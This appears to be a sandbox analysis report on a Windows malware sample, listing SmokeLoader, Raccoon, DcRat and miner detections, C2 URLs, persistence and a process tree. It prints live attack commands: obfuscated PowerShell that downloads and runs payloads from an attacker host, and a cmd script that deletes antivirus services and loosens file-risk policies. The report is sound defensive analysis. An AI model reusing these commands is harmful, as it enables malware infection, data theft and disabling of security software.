Analysis
-
max time kernel
105s -
max time network
164s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
12-08-2021 13:54
Static task
static1
Behavioral task
behavioral1
Sample
bfa1eae4dbb897d44aed1a349d7b66eb.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
bfa1eae4dbb897d44aed1a349d7b66eb.exe
Resource
win10v20210408
General
-
Target
bfa1eae4dbb897d44aed1a349d7b66eb.exe
-
Size
312KB
-
MD5
bfa1eae4dbb897d44aed1a349d7b66eb
-
SHA1
af2895ea60efb8f7ab997b1dd9f958a0d881fc9a
-
SHA256
1202993e02cafc378caaea494d97555457f72369b6b94fcfd0202a4cbdf8a9c8
-
SHA512
545544ab90c14adbd090dd1acfe157cf570f695631ecef18cd011a56286da264b0f000cee485199c1185258ac7aed2386a63fd0b3d89250d402e522202603c46
Malware Config
Extracted
https://www.rockonwest.best/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected phishing page
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3608 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4176 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4224 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4252 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4284 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4312 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4364 1860 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4400 1860 schtasks.exe -
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1912-166-0x0000000000400000-0x0000000000943000-memory.dmp family_raccoon behavioral2/memory/1912-165-0x0000000000B00000-0x0000000000B91000-memory.dmp family_raccoon behavioral2/memory/4204-274-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/4204-275-0x000000000044003F-mapping.dmp family_raccoon behavioral2/memory/4204-283-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\C9C0.exe dcrat C:\Users\Admin\AppData\Local\Temp\C9C0.exe dcrat C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe dcrat C:\reviewbrokercrtCommon\reviewbrokercrtCommonsessionperfDll.exe dcrat C:\Users\Admin\AppData\Local\Temp\234.exe dcrat C:\Users\Admin\AppData\Local\Temp\234.exe dcrat C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe dcrat C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe dcrat -
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4628-573-0x00000001402F327C-mapping.dmp xmrig behavioral2/memory/4628-575-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 876 2112 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 17 IoCs
Processes:
C401.exeC838.exeC9C0.exeCCDE.exeRuntimebroker.exeD1F0.exeDD5B.exeE4CE.exereviewbrokercrtCommonsessionperfDll.exeproliv.sfx.exeproliv.exe26.exe234.execonhost.exeD1F0.exeservices64.exesihost64.exepid process 2116 C401.exe 1392 C838.exe 3904 C9C0.exe 3148 CCDE.exe 4068 Runtimebroker.exe 812 D1F0.exe 1912 DD5B.exe 3948 E4CE.exe 512 reviewbrokercrtCommonsessionperfDll.exe 2904 proliv.sfx.exe 1768 proliv.exe 3528 26.exe 3456 234.exe 4472 conhost.exe 4204 D1F0.exe 1612 services64.exe 4008 sihost64.exe -
Deletes itself 1 IoCs
Processes:
pid process 3028 -
Drops startup file 3 IoCs
Processes:
cmd.exeRuntimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 6 IoCs
Processes:
DD5B.exeD1F0.exepid process 1912 DD5B.exe 1912 DD5B.exe 1912 DD5B.exe 1912 DD5B.exe 1912 DD5B.exe 4204 D1F0.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\schemas\\AvailableNetwork\\explorer.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\System32\\wbem\\NetTCPIP_Uninstall\\WmiPrvSE.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Program Files\\7-Zip\\Lang\\WmiPrvSE.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Windows\\System32\\ddptrace\\taskhostw.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Windows\\System32\\KBDTH3\\spoolsv.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\System32\\C_1142\\SppExtComObj.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\odt\\dllhost.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('https://www.rockonwest.best/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 38 ipinfo.io 39 ipinfo.io -
Drops file in System32 directory 8 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exedescription ioc process File created C:\Windows\System32\ddptrace\ea9f0e6c9e2dcd4dfacdaf29ba21541fb815a988 reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\wbem\NetTCPIP_Uninstall\WmiPrvSE.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\wbem\NetTCPIP_Uninstall\24dbde2999530ef5fd907494bc374d663924116c reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\KBDTH3\spoolsv.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\KBDTH3\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4 reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\C_1142\SppExtComObj.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\C_1142\e1ef82546f0b02b7e974f28047f3788b1128cce1 reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\ddptrace\taskhostw.exe reviewbrokercrtCommonsessionperfDll.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
bfa1eae4dbb897d44aed1a349d7b66eb.exeD1F0.exeservices64.exedescription pid process target process PID 3728 set thread context of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 812 set thread context of 4204 812 D1F0.exe D1F0.exe PID 1612 set thread context of 4628 1612 services64.exe explorer.exe -
Drops file in Program Files directory 4 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exedescription ioc process File created C:\Program Files\7-Zip\Lang\WmiPrvSE.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Program Files\7-Zip\Lang\24dbde2999530ef5fd907494bc374d663924116c reviewbrokercrtCommonsessionperfDll.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\088424020bedd6b28ac7fd22ee35dcd7322895ce reviewbrokercrtCommonsessionperfDll.exe -
Drops file in Windows directory 3 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exedescription ioc process File opened for modification C:\Windows\schemas\AvailableNetwork\explorer.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\schemas\AvailableNetwork\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\schemas\AvailableNetwork\explorer.exe reviewbrokercrtCommonsessionperfDll.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4792 4204 WerFault.exe D1F0.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
bfa1eae4dbb897d44aed1a349d7b66eb.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfa1eae4dbb897d44aed1a349d7b66eb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfa1eae4dbb897d44aed1a349d7b66eb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfa1eae4dbb897d44aed1a349d7b66eb.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4284 schtasks.exe 4364 schtasks.exe 4400 schtasks.exe 4376 schtasks.exe 5096 schtasks.exe 3608 schtasks.exe 4176 schtasks.exe 4252 schtasks.exe 4224 schtasks.exe 4312 schtasks.exe -
Modifies registry class 1 IoCs
Processes:
C9C0.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings C9C0.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bfa1eae4dbb897d44aed1a349d7b66eb.exepid process 2524 bfa1eae4dbb897d44aed1a349d7b66eb.exe 2524 bfa1eae4dbb897d44aed1a349d7b66eb.exe 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3028 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
bfa1eae4dbb897d44aed1a349d7b66eb.exepid process 2524 bfa1eae4dbb897d44aed1a349d7b66eb.exe 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exe234.exepowershell.execonhost.exedescription pid process Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 512 reviewbrokercrtCommonsessionperfDll.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 3456 234.exe Token: SeDebugPrivilege 3200 powershell.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 4472 conhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
C401.exepid process 2116 C401.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3028 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bfa1eae4dbb897d44aed1a349d7b66eb.exeC9C0.exeC838.exeWScript.exeE4CE.execmd.exeproliv.sfx.exeRuntimebroker.exeproliv.exedescription pid process target process PID 3728 wrote to memory of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 3728 wrote to memory of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 3728 wrote to memory of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 3728 wrote to memory of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 3728 wrote to memory of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 3728 wrote to memory of 2524 3728 bfa1eae4dbb897d44aed1a349d7b66eb.exe bfa1eae4dbb897d44aed1a349d7b66eb.exe PID 3028 wrote to memory of 2116 3028 C401.exe PID 3028 wrote to memory of 2116 3028 C401.exe PID 3028 wrote to memory of 2116 3028 C401.exe PID 3028 wrote to memory of 1392 3028 C838.exe PID 3028 wrote to memory of 1392 3028 C838.exe PID 3028 wrote to memory of 1392 3028 C838.exe PID 3028 wrote to memory of 3904 3028 C9C0.exe PID 3028 wrote to memory of 3904 3028 C9C0.exe PID 3028 wrote to memory of 3904 3028 C9C0.exe PID 3028 wrote to memory of 3148 3028 CCDE.exe PID 3028 wrote to memory of 3148 3028 CCDE.exe PID 3028 wrote to memory of 3148 3028 CCDE.exe PID 3904 wrote to memory of 3180 3904 C9C0.exe WScript.exe PID 3904 wrote to memory of 3180 3904 C9C0.exe WScript.exe PID 3904 wrote to memory of 3180 3904 C9C0.exe WScript.exe PID 1392 wrote to memory of 4068 1392 C838.exe Runtimebroker.exe PID 1392 wrote to memory of 4068 1392 C838.exe Runtimebroker.exe PID 1392 wrote to memory of 4068 1392 C838.exe Runtimebroker.exe PID 3028 wrote to memory of 812 3028 D1F0.exe PID 3028 wrote to memory of 812 3028 D1F0.exe PID 3028 wrote to memory of 812 3028 D1F0.exe PID 3028 wrote to memory of 1912 3028 DD5B.exe PID 3028 wrote to memory of 1912 3028 DD5B.exe PID 3028 wrote to memory of 1912 3028 DD5B.exe PID 3180 wrote to memory of 204 3180 WScript.exe cmd.exe PID 3180 wrote to memory of 204 3180 WScript.exe cmd.exe PID 3180 wrote to memory of 204 3180 WScript.exe cmd.exe PID 3028 wrote to memory of 3948 3028 E4CE.exe PID 3028 wrote to memory of 3948 3028 E4CE.exe PID 3028 wrote to memory of 3948 3028 E4CE.exe PID 3948 wrote to memory of 2904 3948 E4CE.exe proliv.sfx.exe PID 3948 wrote to memory of 2904 3948 E4CE.exe proliv.sfx.exe PID 3948 wrote to memory of 2904 3948 E4CE.exe proliv.sfx.exe PID 204 wrote to memory of 512 204 cmd.exe reviewbrokercrtCommonsessionperfDll.exe PID 204 wrote to memory of 512 204 cmd.exe reviewbrokercrtCommonsessionperfDll.exe PID 3028 wrote to memory of 3640 3028 explorer.exe PID 3028 wrote to memory of 3640 3028 explorer.exe PID 3028 wrote to memory of 3640 3028 explorer.exe PID 3028 wrote to memory of 3640 3028 explorer.exe PID 2904 wrote to memory of 1768 2904 proliv.sfx.exe proliv.exe PID 2904 wrote to memory of 1768 2904 proliv.sfx.exe proliv.exe PID 2904 wrote to memory of 1768 2904 proliv.sfx.exe proliv.exe PID 3028 wrote to memory of 2296 3028 explorer.exe PID 3028 wrote to memory of 2296 3028 explorer.exe PID 3028 wrote to memory of 2296 3028 explorer.exe PID 4068 wrote to memory of 3200 4068 Runtimebroker.exe powershell.exe PID 4068 wrote to memory of 3200 4068 Runtimebroker.exe powershell.exe PID 4068 wrote to memory of 3200 4068 Runtimebroker.exe powershell.exe PID 1768 wrote to memory of 3528 1768 proliv.exe 26.exe PID 1768 wrote to memory of 3528 1768 proliv.exe 26.exe PID 3028 wrote to memory of 2272 3028 explorer.exe PID 3028 wrote to memory of 2272 3028 explorer.exe PID 3028 wrote to memory of 2272 3028 explorer.exe PID 3028 wrote to memory of 2272 3028 explorer.exe PID 1768 wrote to memory of 3456 1768 proliv.exe 234.exe PID 1768 wrote to memory of 3456 1768 proliv.exe 234.exe PID 3028 wrote to memory of 3640 3028 explorer.exe PID 3028 wrote to memory of 3640 3028 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe"C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe"C:\Users\Admin\AppData\Local\Temp\bfa1eae4dbb897d44aed1a349d7b66eb.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2524
-
C:\Users\Admin\AppData\Local\Temp\C401.exeC:\Users\Admin\AppData\Local\Temp\C401.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2116
-
C:\Users\Admin\AppData\Local\Temp\C838.exeC:\Users\Admin\AppData\Local\Temp\C838.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''https://www.rockonwest.best/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('https://www.rockonwest.best/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
PID:2112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:4576
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add 